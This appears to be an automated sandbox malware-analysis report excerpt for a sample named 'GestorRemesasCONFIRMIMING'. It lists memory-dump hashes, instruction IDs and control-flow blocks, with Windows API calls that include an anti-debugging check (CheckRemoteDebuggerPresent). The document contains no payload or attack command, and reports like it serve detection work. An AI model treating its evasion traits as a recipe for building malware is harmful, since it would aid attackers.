                                                  • Opcode Fuzzy Hash: c010d1efc148878a61a2dd9b5ec466c36b6fc7fcec465e56aca8d3710c243bd8
                                                  • Instruction Fuzzy Hash: 0D328034B50209CFDB54DB68D880BAEB7B6FB88310F208529E505EB755DB39EC46CB91
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: af784a152be32696d9ece390dd3f03fb5010508b8117c29d4e351e57839d9978
                                                  • Instruction ID: 72c82540badd67781ffd7ec97d88a0987e143dbd8bb2b80ea36787954db040be
                                                  • Opcode Fuzzy Hash: af784a152be32696d9ece390dd3f03fb5010508b8117c29d4e351e57839d9978
                                                  • Instruction Fuzzy Hash: 5312E471F002598FDB60DBA4D88066EB7B6EB84310F36842AE956DF785DA74DC42CB80
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9bb8361db0147de559e2cad870e1c9bb7e318ba7738218ddc180650dca5bd38e
                                                  • Instruction ID: 457f38b200e9fbd1bc46c41e10aa700b20c14b4c83a2ff5556601a2dd5352c0a
                                                  • Opcode Fuzzy Hash: 9bb8361db0147de559e2cad870e1c9bb7e318ba7738218ddc180650dca5bd38e
                                                  • Instruction Fuzzy Hash: FA222D30E0014D8BEF64DBA8D5907ADB7B6EB85310F748526E405DBB9ADA34DC82CB51
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f015f07409dfdf077a81e0619c19c929570726b6a16cb67e50a521f216c88e46
                                                  • Instruction ID: 380d778741d466e0fee0a646ca85a016973b8fe04ae9222cd87721c7716e3b41
                                                  • Opcode Fuzzy Hash: f015f07409dfdf077a81e0619c19c929570726b6a16cb67e50a521f216c88e46
                                                  • Instruction Fuzzy Hash: 19323E30E1065ACFDB15EF74C85069DB7B6BFD9300F6086AAD409AB654EF70AD85CB80
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 25657d5f1c456b52eadb233a8a4a928015d4ccffce1b0826499fc3a684b4bcc1
                                                  • Instruction ID: 6ee2d331550bc1a1d89883502e18d8c49e801fd6d28a2b4125eeb4c5615502e6
                                                  • Opcode Fuzzy Hash: 25657d5f1c456b52eadb233a8a4a928015d4ccffce1b0826499fc3a684b4bcc1
                                                  • Instruction Fuzzy Hash: 1C029E30B0021A8FDB54DBA8D490AAEB7E6FF84310F348529E4069F795DB35ED42CB90

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 068F3D5E
                                                  • GetCurrentThread.KERNEL32 ref: 068F3D9B
                                                  • GetCurrentProcess.KERNEL32 ref: 068F3DD8
                                                  • GetCurrentThreadId.KERNEL32 ref: 068F3E31
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 94f57575df17fc234ad03acfadb404bd0d9797b3dcd7541db6f01436fae946f3
                                                  • Instruction ID: bebf18d20a72fee7aad6571a85ed9852eb9dccb5c24520c6802ec5bdf60aed7b
                                                  • Opcode Fuzzy Hash: 94f57575df17fc234ad03acfadb404bd0d9797b3dcd7541db6f01436fae946f3
                                                  • Instruction Fuzzy Hash: D85189B090034ACFEB54DFA9D948B9EBBF1FF88314F208059E509A7351DB745944CBA5

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 068F3D5E
                                                  • GetCurrentThread.KERNEL32 ref: 068F3D9B
                                                  • GetCurrentProcess.KERNEL32 ref: 068F3DD8
                                                  • GetCurrentThreadId.KERNEL32 ref: 068F3E31
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 17b7f68d5d1b811d856fb64224787509fa18b5f05eec97b06f31bd209a67f5bb
                                                  • Instruction ID: 4d3f185a60a93d2970b1ca79a66fb766a354d45e60bce62b3e90283316d03a55
                                                  • Opcode Fuzzy Hash: 17b7f68d5d1b811d856fb64224787509fa18b5f05eec97b06f31bd209a67f5bb
                                                  • Instruction Fuzzy Hash: E05157B0900349CFEB54DFA9D948B9EBBF1FF88314F208059E609A73A1DB745944CBA5

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 653 68fc370-68fc38f 655 68fc3bb-68fc3bf 653->655 656 68fc391-68fc39e call 68fb744 653->656 658 68fc3d3-68fc414 655->658 659 68fc3c1-68fc3cb 655->659 661 68fc3b4 656->661 662 68fc3a0 656->662 665 68fc416-68fc41e 658->665 666 68fc421-68fc42f 658->666 659->658 661->655 710 68fc3a6 call 68fc60a 662->710 711 68fc3a6 call 68fc618 662->711 665->666 667 68fc453-68fc455 666->667 668 68fc431-68fc436 666->668 673 68fc458-68fc45f 667->673 670 68fc438-68fc43f call 68fb750 668->670 671 68fc441 668->671 669 68fc3ac-68fc3ae 669->661 672 68fc4f0-68fc5b0 669->672 675 68fc443-68fc451 670->675 671->675 705 68fc5b8-68fc5e3 GetModuleHandleW 672->705 706 68fc5b2-68fc5b5 672->706 676 68fc46c-68fc473 673->676 677 68fc461-68fc469 673->677 675->673 679 68fc475-68fc47d 676->679 680 68fc480-68fc489 call 68f48f4 676->680 677->676 679->680 685 68fc48b-68fc493 680->685 686 68fc496-68fc49b 680->686 685->686 687 68fc49d-68fc4a4 686->687 688 68fc4b9-68fc4c6 686->688 687->688 690 68fc4a6-68fc4b6 call 68f9d60 call 68fb760 687->690 695 68fc4e9-68fc4ef 688->695 696 68fc4c8-68fc4e6 688->696 690->688 696->695 707 68fc5ec-68fc600 705->707 708 68fc5e5-68fc5eb 705->708 706->705 708->707 710->669 711->669
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 068FC5D6
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: f49280ac885f12964d1d7c730d9ebfff62bf5299db7c8374362b34b6945a4e0c
                                                  • Instruction ID: 72f45608266559cd00649049dc98f8800a4384e70aa79f7b21487cf68fbe55ee
                                                  • Opcode Fuzzy Hash: f49280ac885f12964d1d7c730d9ebfff62bf5299db7c8374362b34b6945a4e0c
                                                  • Instruction Fuzzy Hash: 14812370A10B098FD7A4DF2AD44076BBBF1BB88204F10892ED696D7A40DB75E945CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 712 68fe544-68fe5b6 714 68fe5b8-68fe5be 712->714 715 68fe5c1-68fe5c8 712->715 714->715 716 68fe5ca-68fe5d0 715->716 717 68fe5d3-68fe60b 715->717 716->717 718 68fe613-68fe672 CreateWindowExW 717->718 719 68fe67b-68fe6b3 718->719 720 68fe674-68fe67a 718->720 724 68fe6b5-68fe6b8 719->724 725 68fe6c0 719->725 720->719 724->725 726 68fe6c1 725->726 726->726
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 068FE662
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0

                                                  Control-flow Graph: function 68fe550-68fe6c1, CreateWindowExW called in block 68fe5d3-68fe672 (graph image omitted)
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 068FE662
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0

                                                  Control-flow Graph: function 294f2d4-294f3b5, GlobalMemoryStatusEx called in block 294f2f7-294f384 (graph image omitted)
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0294F377
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4537442491.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2940000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0

                                                  Control-flow Graph: function 2947eb8-2947f88, CheckRemoteDebuggerPresent called in block 2947eb8-2947f44 (graph image omitted)
                                                  APIs
                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02947F37
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4537442491.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2940000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0

                                                  Control-flow Graph: function 68f3f20-68f3fe2, DuplicateHandle called in block 68f3f28-68f3fbc (graph image omitted)
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 068F3FAF
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0

                                                  Control-flow Graph: function 68f3f28-68f3fe2, DuplicateHandle called in block 68f3f28-68f3fbc (graph image omitted)
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 068F3FAF
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0

                                                  Control-flow Graph: function 68fc7d2-68fc875, LoadLibraryExW called in block 68fc820-68fc84f (graph image omitted)
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,068FC651,00000800,00000000,00000000), ref: 068FC842
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0

                                                  Control-flow Graph: function 68fb788-68fc875, LoadLibraryExW called in block 68fc820-68fc84f (graph image omitted)
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,068FC651,00000800,00000000,00000000), ref: 068FC842
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0

                                                  Control-flow Graph: function 294f310-294f3b5, GlobalMemoryStatusEx called in block 294f310-294f384 (graph image omitted)
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0294F377
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4537442491.0000000002940000.00000040.00000800.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_2940000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 068FC5D6
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551352397.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_68f0000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |
                                                  • API String ID: 0-2343686810
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |
                                                  • API String ID: 0-2343686810
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Instruction ID: 1fd47d4c8da83ea84a86bdde56bc366168a279869fbf0e9963a238ceb2009af6
                                                  • Opcode Fuzzy Hash: 170307152f8808f3c5c72ce59d546d396a7e62d0955a2aaefeb1a6211625a911
                                                  • Instruction Fuzzy Hash: C5618330F002189FEB54DBA5C8547AEBBF6EB88700F20852AE505EB395DF745D45CB91
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b6a5efc70688cd076250b97a86700e322ef0d703fdcc13ebb89c0433895ddaef
                                                  • Instruction ID: e734d5dbfdb1e8b56c6f52296ffb744db6fa4bf604a3fe7c68cc8ea7c822460a
                                                  • Opcode Fuzzy Hash: b6a5efc70688cd076250b97a86700e322ef0d703fdcc13ebb89c0433895ddaef
                                                  • Instruction Fuzzy Hash: A151DD35E0110DDFDF14ABB8E4546AEBBF6EB88311F30886AE506DB651DB358946CB80
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7a7a19864644422fb37e9c74c682d4208ce727b904f3bacc3aa90c6bef09635b
                                                  • Instruction ID: 25eaf3e60714a049971621db7ca26b05695e7585b93b8fef7341657e273910b7
                                                  • Opcode Fuzzy Hash: 7a7a19864644422fb37e9c74c682d4208ce727b904f3bacc3aa90c6bef09635b
                                                  • Instruction Fuzzy Hash: FD51A570F2011C9BEF6466BCD85476F3A9AD7C9350F30442AE10ADB7D6CE69CC4297A2
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fd155f9874164a822b5462e73282862007bdb97e54828b7ef79613739eb0e3ba
                                                  • Instruction ID: e67bd63b58f16dfa909392185031ab3597512bd8ae5cfc739036936ba55ce48e
                                                  • Opcode Fuzzy Hash: fd155f9874164a822b5462e73282862007bdb97e54828b7ef79613739eb0e3ba
                                                  • Instruction Fuzzy Hash: 8B517074F2011C9BEF6466ACD89472F3A9AD7C9350F30442AE10ADB7D6CE69CC429792
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1bad0315061dd5346d56aa91c5800cc288c9a4445d5c51fcee447353274937a0
                                                  • Instruction ID: 550fc0eee2456d42885d0ae32d757b1d5411bd9057223b4826aacc882b3080ba
                                                  • Opcode Fuzzy Hash: 1bad0315061dd5346d56aa91c5800cc288c9a4445d5c51fcee447353274937a0
                                                  • Instruction Fuzzy Hash: 4D514230B0114A8FDB64EB74D951BAE73F6BF85600F24856AC806DB749EE30DC41DB91
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3bfcbaeb51699f22625a53ae1ce86fd22e7e353eec842365ff7e9cf1746e50d5
                                                  • Instruction ID: 199558aa524e1551bfe0fd736027ae67f775da7e182f2a723cebb6bbbb6c353e
                                                  • Opcode Fuzzy Hash: 3bfcbaeb51699f22625a53ae1ce86fd22e7e353eec842365ff7e9cf1746e50d5
                                                  • Instruction Fuzzy Hash: 26417271E006099FDF70CFA9D880AAFFBB5FB84314F31492AD25ADB640D631E8458B91
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9d8d27361401d326d988c8bef828957608577e4a3b3f9618dd58aea130a5cab6
                                                  • Instruction ID: b9a0ead3b23bbfa82de87a1e5887df8372a142bff09be15890abd9805a841188
                                                  • Opcode Fuzzy Hash: 9d8d27361401d326d988c8bef828957608577e4a3b3f9618dd58aea130a5cab6
                                                  • Instruction Fuzzy Hash: 1D418070F002589FDB54DBE5C854BAEBBF6EF88700F20852AE205AB395DB709C05CB90
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf8c57d16ffad5a94f884432898571b93697182f963ae76bd4451fed3325693d
                                                  • Instruction ID: 750d18e7d970c7d2194cee228cae89e92900841496c30d8b98153334aa4291ed
                                                  • Opcode Fuzzy Hash: bf8c57d16ffad5a94f884432898571b93697182f963ae76bd4451fed3325693d
                                                  • Instruction Fuzzy Hash: 06418F70E0024E9FDF65DFB5C8546AEBBB6EF85340F34492AD406DB640DB74A84ACB81
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 69053d40f61e17f2a86c5b9bad2163ae0696613c0a4a19308f5786eb3f2db644
                                                  • Instruction ID: be05ff41b105ddd0a6535c3b72dd5260e4a69416fb9cc0d89aa60573109072ad
                                                  • Opcode Fuzzy Hash: 69053d40f61e17f2a86c5b9bad2163ae0696613c0a4a19308f5786eb3f2db644
                                                  • Instruction Fuzzy Hash: 4441B6B5E0010A8FDF618FA9D480B7EBBB6EB85310F368829D559CFA41C635D842CB91
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: baae445e40141c4867b61f0c4656cfe3ec70d5da07e7fdf08a456871a1791e09
                                                  • Instruction ID: a9661fdfe101a842f59ecd34a339adaa4bef7d40ae77a221582b1359b3ea2b1e
                                                  • Opcode Fuzzy Hash: baae445e40141c4867b61f0c4656cfe3ec70d5da07e7fdf08a456871a1791e09
                                                  • Instruction Fuzzy Hash: 0731DD30B1024A8FDB59AB34855476E3BA7AF89200F604869D402DFB85DF35DE42C791
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aee721d04a3a67e3150b628c99eea55d37dd90a5618d8588629d7ee2669bc494
                                                  • Instruction ID: 4c42d47c81440218495559d78cec7129a4b6f638ae6ec051ad32e06bf3315d13
                                                  • Opcode Fuzzy Hash: aee721d04a3a67e3150b628c99eea55d37dd90a5618d8588629d7ee2669bc494
                                                  • Instruction Fuzzy Hash: 0131CB30B102098FDB59AB78C95476E7BA7AFC9640F604829D402DF785EE31DE82CBD1
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e3bed6e956f280e70def69f90c64c24f1d2ffab1ec3ad60764775303bdb72a47
                                                  • Instruction ID: d4550c72fc6866747846664f7903dfc303696651e766b77b2766cd0d42ae0e9b
                                                  • Opcode Fuzzy Hash: e3bed6e956f280e70def69f90c64c24f1d2ffab1ec3ad60764775303bdb72a47
                                                  • Instruction Fuzzy Hash: 5A316F34E1020A9FDB19DFA4D85469EB7B6AF89700F208519E906EB750DB71ED81CB90
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eeb5bb46187f3e26900af93a5450291c3e5b0dcac2783e7a7267dd50a9ce5468
                                                  • Instruction ID: 05c2ac657575a19f7852345a4f31f94223df62789a84daf69afc2313b482f009
                                                  • Opcode Fuzzy Hash: eeb5bb46187f3e26900af93a5450291c3e5b0dcac2783e7a7267dd50a9ce5468
                                                  • Instruction Fuzzy Hash: 94316030E1020A9FDB19DFA4D85469EB7B6FF89300F208519E906EB740DB71AD81CB90
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e0d67bbe3d31001ea2e42c5ff7bfa1888b6df054fb13f444ab8132beae04722
                                                  • Instruction ID: ac21ae9b22c6e1b14a8b8afff5335c340aaaff0bfd3e00da7e57cce2fa008d34
                                                  • Opcode Fuzzy Hash: 2e0d67bbe3d31001ea2e42c5ff7bfa1888b6df054fb13f444ab8132beae04722
                                                  • Instruction Fuzzy Hash: A721B275F012099FDB50DF79E981AEEBBF5AB48310F248169E905EB341EB30DC408B94
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aeabca8ffd40d68a1535ae81047f17456d8cee127a448552d0304989a558e07f
                                                  • Instruction ID: 495532fb0f87b3222f082d4396582841d500bd0a485938b9fa7d6096250c2ad6
                                                  • Opcode Fuzzy Hash: aeabca8ffd40d68a1535ae81047f17456d8cee127a448552d0304989a558e07f
                                                  • Instruction Fuzzy Hash: 5511EC307003444FDB59B738646023E7AD3ABCA214729487EE10ACB382CF388C079792
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b86cfe784425152d343658f69cff9bf8209fa032295e8caf4ac79e36505193f
                                                  • Instruction ID: f20dac0dc13fea11eafbafcf3efa20100640e0640e90d0313786f0228b1729a3
                                                  • Opcode Fuzzy Hash: 0b86cfe784425152d343658f69cff9bf8209fa032295e8caf4ac79e36505193f
                                                  • Instruction Fuzzy Hash: 7B219275F012199FDF50DF69E981AAEB7F5EB48310F208165E905EB341EB34DC418B94
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4535305653.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_ced000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
